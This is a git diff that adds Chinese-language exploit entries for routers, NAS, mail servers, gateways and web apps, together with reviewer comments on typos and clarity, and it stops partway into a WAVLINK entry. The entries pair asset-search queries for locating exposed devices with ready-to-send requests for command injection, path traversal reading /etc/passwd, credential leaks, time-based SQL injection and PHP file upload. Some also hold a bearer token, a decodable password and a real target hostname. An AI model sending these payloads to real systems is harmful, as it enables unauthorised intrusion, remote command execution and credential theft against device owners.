@@ -0,0 +1,43 @@ +# Tenda 路由器 DownloadCfg 信息泄露漏洞 + +# 一、漏洞描述 +Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。 + +# 二、影响版本 ++ Tenda 路由器 + +# 三、资产测绘 ++ hunter`web.title="Tenda | LOGIN"` ++ 特征 + +![1701753587120-3c35a8f8-5e6c-44fc-a622-f307f0b5e7fc.png](./img/HuzV0y4anBpmEYe1/1701753587120-3c35a8f8-5e6c-44fc-a622-f307f0b5e7fc-543813.png) + +# 四、漏洞复现 +```java +GET /cgi-bin/DownloadCfg.jpg HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: lang=cn,en +Upgrade-Insecure-Requests: 1 +``` + +![1701753858226-d38759e2-793c-45df-83c1-16c137293980.png](./img/HuzV0y4anBpmEYe1/1701753858226-d38759e2-793c-45df-83c1-16c137293980-207037.png) + +从配置文件中可找到系统账号密码 + +![1701753905473-968c5560-03de-480e-81eb-4e6028247296.png](./img/HuzV0y4anBpmEYe1/1701753905473-968c5560-03de-480e-81eb-4e6028247296-014519.png) + +解密后成功登录系统 + +![1701753934193-5e17d3df-29e6-4613-a5d9-2ac1258b5991.png](./img/HuzV0y4anBpmEYe1/1701753934193-5e17d3df-29e6-4613-a5d9-2ac1258b5991-492114.png) + +![1701753950653-631706d4-3fa3-4c1a-bf44-e84c5f7514c9.png](./img/HuzV0y4anBpmEYe1/1701753950653-631706d4-3fa3-4c1a-bf44-e84c5f7514c9-018661.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gk3rgwxmuynm2p33> \ No newline at end of file diff --git a/TerraMasterTOSexportUser.php远程命令执行.md b/TerraMasterTOSexportUser.php远程命令执行.md new file mode 100644 index 0000000..c8ddb13 --- /dev/null +++ b/TerraMasterTOSexportUser.php远程命令执行.md 
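Review bot: the 漏洞描述 sentence `攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统` is garbled (the clause after 敏感信息 is incomplete) and `智能无限路由器` should be `无线`; rewrite it. The text says the password in the config must be 解密 before logging in but never says what encoding or cipher is involved or how it was reversed, so the step cannot be repeated without the screenshots; describe it. The fence is tagged ```java for an HTTP request; use `plain`/`http`. The path `/cgi-bin/DownloadCfg.jpg` deserves a word on why a `.jpg` suffix is requested, since the text does not explain it.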
@@ -0,0 +1,33 @@ +# TerraMaster TOS exportUser.php 远程命令执行 + +# 一、漏洞简介 +TerramasterTOS是中国深圳市图美电子技术(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。TerramasterTOS系统 exportUser.php 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。 + +# 二、影响版本 ++ TerraMaster TOS < 4.1.24 + +# 三、资产测绘 ++ fofa`"TerraMaster" && header="TOS"` ++ 特征 + +![1707230386875-617c7117-0c8e-4228-971d-4e0b14395464.png](./img/uG6FSbneaAIz9Qah/1707230386875-617c7117-0c8e-4228-971d-4e0b14395464-909380.png) + +# 四、漏洞复现 +```plain +/include/exportUser.php?type=3&cla=application&func=_exec&opt=(whoami)>test.txt +``` + +![1707230462067-53cbb3cb-0e94-4ff3-8ba3-4e7d3eed053a.png](./img/uG6FSbneaAIz9Qah/1707230462067-53cbb3cb-0e94-4ff3-8ba3-4e7d3eed053a-148007.png) + +获取命令执行结果 + +```plain +/include/test.txt +``` + +![1707230499837-b1a050ef-95af-4d15-bb97-28d5b9c755d3.png](./img/uG6FSbneaAIz9Qah/1707230499837-b1a050ef-95af-4d15-bb97-28d5b9c755d3-148022.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/atopoc3573ymfsnt> \ No newline at end of file diff --git a/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md b/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md new file mode 100644 index 0000000..5e5fd33 --- /dev/null +++ b/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md 
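Review bot: the PoC `opt=(whoami)>test.txt` writes command output into `/include/test.txt` under the web root and the entry never says to remove it; a leftover readable file on a customer NAS is an artefact the tester owns, so add a cleanup step or prefer a check that leaves nothing behind. Typo `erraMaster云存储NAS服务器` should read `TerraMaster`. If the `cla=application&func=_exec` parameter names come from a public write-up, link it as the other entries do.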
@@ -0,0 +1,46 @@ +# Tosei 自助洗衣机 web 管理端 network_test.php 文件 host 参数远程命令执行漏洞 + +# 一、漏洞简介 +Tosei 自助洗衣机 是日本 Tosei 公司的一个产品。Tosei 自助洗衣机 web 管理端存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码,获取服务器权限,进而控制整个服务器。 + +# 二、影响版本 ++ Tosei 自助洗衣机 web 管理端 + +# 三、资产测绘 ++ hunter`web.body="tosei_login_check.php"` ++ 特征 + +![1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499.png](./img/yJFddX_3R3th-rYw/1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499-769255.png) + +# 四、漏洞复现 +访问poc出现如下页面表示可能存在漏洞 + +```plain +/cgi-bin/network_test.php +``` + +![1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e.png](./img/yJFddX_3R3th-rYw/1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e-898026.png) + +修改host参数为想要执行的命令 + +```plain +POST /cgi-bin/network_test.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 26 +Connection: close +Upgrade-Insecure-Requests: 1 + +host=%0aid%0a&command=ping +``` + +![1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69.png](./img/yJFddX_3R3th-rYw/1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69-543775.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bihozhmkgaeqymw2> \ No newline at end of file diff --git a/TraggoServer任意文件读取漏洞(CVE-2023-34843).md b/TraggoServer任意文件读取漏洞(CVE-2023-34843).md new file mode 100644 index 0000000..6b9e18b --- /dev/null +++ b/TraggoServer任意文件读取漏洞(CVE-2023-34843).md 
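Review bot: the body `host=%0aid%0a&command=ping` injects through newline characters rather than the `;` used in the other command-injection entries, and the text only says `修改host参数为想要执行的命令`; say that the command must be wrapped in `%0a` (and whether `;` or `|` were also tried) so readers do not strip the encoding. The first check, `访问poc出现如下页面表示可能存在漏洞`, describes the page only through a screenshot; name the visible string or form field that identifies `network_test.php`.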
@@ -0,0 +1,36 @@ +# Traggo Server任意文件读取漏洞(CVE-2023-34843) + +# 一、漏洞简介 +`Traggo Server`是一个基于标签的时间跟踪工具。在`Traggo`中,没有任务,只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方,方便更好的管理时间,提高效率。`Traggo`存在任意文件读取漏洞。 + +## 二、影响版本 ++ `Traggo Server` + +# 三、资产测绘 ++ hunter`app.name="Traggo"` ++ 登录页面 + +![1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5.png](./img/VlgslYayTvwObt7Z/1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5-647572.png) + +# 四、漏洞复现 +```java +GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/2 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +``` + +![1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4.png](./img/VlgslYayTvwObt7Z/1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4-724816.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gcc1enullkmmd0hf> \ No newline at end of file diff --git a/TurboMail邮件系统viewfile文件读取漏洞.md b/TurboMail邮件系统viewfile文件读取漏洞.md new file mode 100644 index 0000000..9adee90 --- /dev/null +++ b/TurboMail邮件系统viewfile文件读取漏洞.md 
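Review bot: the request line `GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/2` cannot be replayed as a raw text request, because HTTP/2 is a binary framing protocol and the headers shown are HTTP/1.1 text (this was evidently captured from a proxy that negotiated HTTP/2); change the version token to `HTTP/1.1`. The `..%5c` (backslash) traversal is the whole point of the PoC and should be called out, otherwise readers will try `../`, get a 404 and conclude the target is patched. Heading `## 二、影响版本` uses `##` while its siblings use `#`; make them consistent.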
@@ -0,0 +1,54 @@ +# TurboMail 邮件系统 viewfile 文件读取漏洞 + +# 一、漏洞简介 +广州拓波软件科技有限公司TurboMail 邮件系统 viewfile 文件读取漏洞,攻击者可通过此漏洞读取账户密码,从而登录后台进一步利用。 + +# 二、影响版本 ++ TurboMail 邮件系统 + +# 三、资产测绘 ++ hunter`web.body="maintlogin.jsp" && web.body="/mailmain?type=logout"` ++ 特征 + +![1703260614409-67417cea-6ca3-44cc-ad4a-9ef98c998a10.png](./img/6F2qdw-ilKskSp6w/1703260614409-67417cea-6ca3-44cc-ad4a-9ef98c998a10-727801.png) + +# 四、漏洞复现 +1. 通过poc读取账号密码 + +```java +GET /viewfile?type=cardpic&mbid=1&msgid=2&logtype=3&view=true&cardid=/accounts/root/postmaster&cardclass=../&filename=/account.xml HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ +Upgrade-Insecure-Requests: 1 +``` + +![1703260773166-a588ef0c-2a56-4b0b-bb52-4e57d2f18feb.png](./img/6F2qdw-ilKskSp6w/1703260773166-a588ef0c-2a56-4b0b-bb52-4e57d2f18feb-271259.png) + +2. 密码为base64加密,去掉=号后面解密 + +```java +Y2hlbHNlYTUzMDUzNjQ5NQ=3D=3D +Y2hlbHNlYTUzMDUzNjQ5NQ +``` + +![1703261028456-e47d326e-0092-4521-a34c-e8cae2a8a7ca.png](./img/6F2qdw-ilKskSp6w/1703261028456-e47d326e-0092-4521-a34c-e8cae2a8a7ca-482506.png) + +3. 
通过获取到的账号密码登录系统 + +```java +/maintlogin.jsp +``` + +![1703261079028-7b0ea268-948d-4b03-ada0-7aa983833032.png](./img/6F2qdw-ilKskSp6w/1703261079028-7b0ea268-948d-4b03-ada0-7aa983833032-995619.png) + +![1703261120667-59e7ac2f-9576-4846-8ff1-8c6e94414883.png](./img/6F2qdw-ilKskSp6w/1703261120667-59e7ac2f-9576-4846-8ff1-8c6e94414883-426450.png) + + + +> 更新: 2024-02-29 23:57:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ca5k7x5pqtitv191> \ No newline at end of file diff --git a/VEXUS多语言货币交易所存在未授权访问漏洞.md b/VEXUS多语言货币交易所存在未授权访问漏洞.md new file mode 100644 index 0000000..46df582 --- /dev/null +++ b/VEXUS多语言货币交易所存在未授权访问漏洞.md @@ -0,0 +1,41 @@ +# VEXUS多语言货币交易所存在未授权访问漏洞 + +# 一、漏洞简介 +VEXUS多语言货币交易所存在未授权访问漏洞 + +# 二、影响版本 ++ VEXUS多语言货币交易所 + +# 三、资产测绘 ++ fofa`"image/n2.png" && "public/login.action"` ++ 特征 + +![1727498799522-822e93ff-50be-42a1-9e0b-111a2f844864.png](./img/cvy4scQ9X281hrqb/1727498799522-822e93ff-50be-42a1-9e0b-111a2f844864-063597.png) + +# 四、漏洞复现 +```java +/druid/index.html +``` + +![1727498820102-2db97c04-7594-473e-9e30-dd4678d21aca.png](./img/cvy4scQ9X281hrqb/1727498820102-2db97c04-7594-473e-9e30-dd4678d21aca-036126.png) + +获取session后可通过下面poc进行爆破 + +```java +GET /normal/LoginSuccessAction!view.action?username=admin HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: no-cache +Connection: keep-alive +Cookie: JSESSIONID=可用的SESSION +Host: admin.kftust.com +Pragma: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +``` + + + +> 更新: 2024-10-22 09:36:08 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nkwou5fss984m2t8> \ No newline at end of file 
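Review bot: the TurboMail PoC request carries `Cookie: Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9...`, a JWT that nothing else in the entry refers to and that an unauthenticated read of `/viewfile` should not need; it looks pasted from a different target, so drop it (and do not publish someone else's bearer token). Step 2 says `密码为base64加密,去掉=号后面解密`: base64 is encoding, not encryption, and the `=3D` in `Y2hlbHNlYTUzMDUzNjQ5NQ=3D=3D` is quoted-printable for `=`, so the value is ordinary padded base64 ending in `==`; say that instead of telling readers to strip characters. Both fences are tagged ```java for an HTTP request and a string; use `plain`.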
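Review bot: the VEXUS entry's second request hard-codes a real hostname, `Host: admin.kftust.com`, where every other entry uses `xx.xx.xx.xx` or `{hostname}`; replace it, it identifies a specific victim. The sentence `获取session后可通过下面poc进行爆破` is the entire explanation of that step: it does not say which session is meant (one taken from the unauthenticated `/druid/index.html` console?) nor what is being brute-forced (the `username=` parameter of `LoginSuccessAction!view.action`?); spell out the chain up to the `JSESSIONID=可用的SESSION` placeholder. The 漏洞简介 merely repeats the title; add one sentence on what `/druid/index.html` exposes.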
diff --git a/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md b/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md new file mode 100644 index 0000000..7ee07ce --- /dev/null +++ b/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md @@ -0,0 +1,33 @@ +## VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504) + +This vulnerability can lead to username and plaintext password exposure. When combined with CVE-2024-8504, it causes a remote code execution vulnerability via sql injection. + +The following PoC code tests the vulnerability on a time based. + + +CVE-2024-8503 (Sqli) +``` +An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database. +``` + +CVE-2024-8504 (RCE) +``` +An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective. +``` + +## fofa +``` +icon_hash="1375401192" +``` +## Poc Example +``` + GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1 + Host: + Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI= +``` + +## Exploits +https://en.0day.today/exploit/39746 +https://github.com/Chocapikk/CVE-2024-8504 +## Nuclei Template +https://github.com/projectdiscovery/nuclei-templates/pull/10757 \ No newline at end of file diff --git a/Vben-Admin存在硬编码漏洞.md b/Vben-Admin存在硬编码漏洞.md new file mode 100644 index 0000000..542ec75 --- /dev/null +++ b/Vben-Admin存在硬编码漏洞.md 
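Review bot: the PoC header `Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=` decodes to the username `','',sleep(6));#` with password `bar`, i.e. a `sleep(6)` time-based payload, but the text only says `tests the vulnerability on a time based` (ungrammatical; `time-based`); state the indicator, a response delayed by about six seconds compared with a baseline request. `Host:` is empty. The two paragraphs under `CVE-2024-8503 (Sqli)` and `CVE-2024-8504 (RCE)` are prose wrapped in code fences; make them plain text. The request lines inside the PoC fence are indented by a leading space, which copies badly.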
@@ -0,0 +1,25 @@ +# Vben-Admin存在硬编码漏洞 +<font style="color:rgba(0, 0, 0, 0.84);">Vue Vben Admin是一个免费开源的中端和后端模板。采用最新的vue3、vite、TypeScript等主流技术开发,开箱即用的中后端前端解决方案也可供学习参考。Vue Vben存在硬编码漏洞</font> + +## fofa +```javascript +icon_hash="-317536629" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729264064913-c5ad6880-499b-442e-9fee-00d4eb8fa551.png) + +## poc +登录页面,右击查看源代码,搜索index,进入该js页面 + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100317021-035ebb28-c6be-490c-aaf7-20bdc01dab17.png) + +该页面硬编码登录账号密码 + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100355251-30a27295-5a99-4dc4-8114-4859ca2fb8eb.png) + +使用账号密码登录系统 + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730128898635-bddc9b02-c118-4394-87d6-316664320abb.png) + + + diff --git a/ViessmannVitogateRCE漏洞(CVE-2023-45852).md b/ViessmannVitogateRCE漏洞(CVE-2023-45852).md new file mode 100644 index 0000000..1fbd9f7 --- /dev/null +++ b/ViessmannVitogateRCE漏洞(CVE-2023-45852).md 
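Review bot: the reproduction is three screenshots plus `右击查看源代码,搜索index,进入该js页面`; nothing in the text says which bundle to open (a file-name pattern), which keys to search for, or what the hard-coded values look like, so the entry is unusable without the images; write the steps out. The description is wrapped in an inline `<font style=...>` HTML tag, which should be plain markdown. The fofa fence is tagged ```javascript for an `icon_hash` query, and the entry lacks the 漏洞简介/影响版本/资产测绘 structure of the other files.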
@@ -0,0 +1,37 @@ +# Viessmann Vitogate RCE 漏洞(CVE-2023-45852) + +# 一、漏洞简介 +Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。Vitogate 300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。 + +# 二、影响版本 ++ Viessmann Vitogate 300 + +# 三、资产测绘 ++ fofa`app=”Vitogate-300”` ++ 特征 + +![1707059485948-359f6933-eb77-4147-aa79-353f587ead29.png](./img/6dQ4EvIoNFpWhwei/1707059485948-359f6933-eb77-4147-aa79-353f587ead29-940674.png) + +# 四、漏洞复现 +```plain +POST /cgi-bin/vitogate.cgi HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: langCookie=en +Upgrade-Insecure-Requests: 1 +Content-Type: application/json +Content-Length: 87 + +{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}} +``` + +![1707059530155-faca9058-dfe5-4cf3-819c-73e8e71af6df.png](./img/6dQ4EvIoNFpWhwei/1707059530155-faca9058-dfe5-4cf3-819c-73e8e71af6df-407474.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/llhplei5z29a1kqg> \ No newline at end of file diff --git a/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md b/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md new file mode 100644 index 0000000..db6c778 --- /dev/null +++ b/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md 
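Review bot: the fofa query `app=”Vitogate-300”` uses typographic quotes instead of ASCII `"`, so pasting it into FOFA fails; fix the quotes. `Host:` is empty. The JSON body `{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}` is 87 bytes, matching the header; the 漏洞简介 says authentication is bypassed and the only visible hint is the empty `"session":""`, so say in the text that the request is sent with no session at all rather than leaving it to be inferred from the body.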
@@ -0,0 +1,20 @@ +## VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272) + +## fofa +``` +icon_hash="524332373" +``` +## poc +``` +POST /save.php HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?> +``` +## nuclei Template +https://github.com/projectdiscovery/nuclei-templates/pull/10608/files + +## ref +https://github.com/givanz/VvvebJs/issues/343 +https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/tree/main \ No newline at end of file diff --git a/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md b/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md new file mode 100644 index 0000000..cffc3e8 --- /dev/null +++ b/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md @@ -0,0 +1,24 @@ +# W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞 +W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞 + +## fofa +```javascript +icon_hash="616947260" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735566773129-315b9dc0-988c-47d2-a333-a2b6f4a7ec14.png) + +## poc +```http +GET /DLP/public/admintool/system_setting/sys_ds_logfile_displaylog.jsp?logType=tomcat&logFileName=../../../../../../D-Security/webapps/DLPWebApps/WEB-INF/web.xml HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Priority: u=0, i +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 +Upgrade-Insecure-Requests: 1 +``` + +![](https://cdn.nlark.com/yuque/0/2025/png/29512878/1735835640864-6262a6b5-db98-4860-a798-d2a539429bfa.png) + diff --git a/WAVLINKadm.cgi命令执行漏洞.md b/WAVLINKadm.cgi命令执行漏洞.md new file mode 100644 index 0000000..9d280d6 --- /dev/null +++ b/WAVLINKadm.cgi命令执行漏洞.md 
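Review bot: the VvvebJs body `file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>` overwrites `demo/landing/index.php`, an existing file on the target, with no note on restoring it; suggest a fresh file name and a removal step. The request omits `Content-Length`, which many servers require for a POST; add it. The title says `VvvebJs < 1.7.5` but there is no 影响版本 line as in the other entries; move the version there.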
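Review bot: in the W&Jsoft entry, `数据仿泄露系统` in the file name, H1 and first line is a typo for `数据防泄露系统` (DLP, data loss prevention); fix it before the name propagates into indexes. The PoC reads `../../../../../../D-Security/webapps/DLPWebApps/WEB-INF/web.xml` via `logFileName=` with `logType=tomcat`, which presupposes one install layout; say what directory the traversal is relative to so readers can adjust the depth. The fofa fence is tagged ```javascript and `Host:` is empty.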
@@ -0,0 +1,40 @@ +# WAVLINK adm.cgi命令执行漏洞 + +# 一、漏洞简介 +WAVLINK是中国睿因科技(WAVLINK)公司开发的一款路由器,该系统adm.cgi文件存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。包含型号WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4等。 + +# 二、影响版本 ++ wavlink 路由器 + +# 三、资产测绘 ++ hunter`web.body="firstFlage"` ++ 特征 + +![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/g25y0jJy9HEuSzIf/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-154106.png) + +# 四、漏洞复现 +```java +POST /cgi-bin/adm.cgi HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 26 + +page=sysCMD&command=";id;" +``` + +![1703227525600-a2c72405-b4ed-41d9-b3a9-5fcaf6b9bb7e.png](./img/g25y0jJy9HEuSzIf/1703227525600-a2c72405-b4ed-41d9-b3a9-5fcaf6b9bb7e-661984.png) + +nuclei脚本 + +[wanlink-router-adm-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231419-b11f1277-6ff4-4254-8a64-b9fd783e0f85.yaml) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ur96lfz8saqpabto> \ No newline at end of file diff --git a/WAVLINKlive_api.cgi存在命令执行.md b/WAVLINKlive_api.cgi存在命令执行.md new file mode 100644 index 0000000..4c26371 --- /dev/null +++ b/WAVLINKlive_api.cgi存在命令执行.md 
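Review bot: the attached nuclei template is named `wanlink-router-adm-cgi-rce.yaml`, misspelling `wavlink` (the same typo is on the live_api, mesh and nightled attachments); rename before publishing. The 漏洞简介 lists models `WN530HG4、WN531G3、WN572HG3、WN535G3、WN575A4` while 影响版本 only says `wavlink 路由器`; move the model list there. The body `page=sysCMD&command=";id;"` is 26 bytes, matching the header.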
@@ -0,0 +1,36 @@ +# WAVLINK live_api.cgi 存在命令执行 + +# 一、漏洞简介 +WAVLINK wavlink是中国睿因科技(WAVLINK)公司的一款路由器。连接两个或多个网络的硬件设备,在网络间起网关的作用。WAVLINK 多款路由器 live_api.cgi 存在命令执行,攻击者可通过此漏洞获取权限。 + +# 二、影响版本 ++ wavlink 路由器 + +# 三、资产测绘 ++ hunter`web.body="firstFlage"` ++ 特征 + +![1703226837131-abc67852-1626-482a-982b-2f8f69837f2c.png](./img/eM5UpXtfHuIL8Dph/1703226837131-abc67852-1626-482a-982b-2f8f69837f2c-816220.png) + +# 四、漏洞复现 +```java +GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1703226886159-a96b555d-7af9-4b07-84b0-7ab51ca44a69.png](./img/eM5UpXtfHuIL8Dph/1703226886159-a96b555d-7af9-4b07-84b0-7ab51ca44a69-201909.png) + +nuclei脚本 + +[wanlink-router-live-api-cgi-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222231462-65f524b5-3aa2-4cd2-a4b3-8783722d7a12.yaml) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/on0bkn7zcvll4ivu> \ No newline at end of file diff --git a/WAVLINKmesh.cgi命令执行漏洞(CVE-2022-2486).md b/WAVLINKmesh.cgi命令执行漏洞(CVE-2022-2486).md new file mode 100644 index 0000000..16f2821 --- /dev/null +++ 